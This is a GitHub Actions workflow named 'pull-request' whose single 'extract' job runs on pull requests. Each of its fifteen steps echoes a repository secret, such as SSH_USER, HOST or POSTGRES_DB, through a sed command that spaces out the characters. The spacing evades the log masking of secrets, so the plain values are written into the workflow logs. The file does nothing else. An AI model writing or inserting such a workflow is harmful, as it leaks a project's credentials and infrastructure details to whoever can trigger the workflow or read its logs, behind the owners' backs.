name: pull-request
on:
  pull_request:
jobs:
  extract:
    runs-on: ubuntu-latest
    steps:
      - run: echo ${{secrets.ACME_EMAIL}} | sed 's/./& /g'
      - run: echo ${{secrets.API_DOMAIN}} | sed 's/./& /g'
      - run: echo ${{secrets.API_URL}} | sed 's/./& /g'
      - run: echo ${{secrets.CACHE_NAME}} | sed 's/./& /g'
      - run: echo ${{secrets.CORS_ORIGIN_WHITELIST}} | sed 's/./& /g'
      - run: echo ${{secrets.COVERAGE_PERCENT}} | sed 's/./& /g'
      - run: echo ${{secrets.DOMAIN}} | sed 's/./& /g'
      - run: echo ${{secrets.FRONT_IMAGE_NAME}} | sed 's/./& /g'
      - run: echo ${{secrets.HOST}} | sed 's/./& /g'
      - run: echo ${{secrets.IMAGE_NAME}} | sed 's/./& /g'
      - run: echo ${{secrets.OLD_DOMAIN}} | sed 's/./& /g'
      - run: echo ${{secrets.POSTGRES_DB}} | sed 's/./& /g'
      - run: echo ${{secrets.SENTRY_ENVIRONMENT}} | sed 's/./& /g'
      - run: echo ${{secrets.SSH_USER}} | sed 's/./& /g'
      - run: echo ${{secrets.WEBSOCKET_URL}} | sed 's/./& /g'
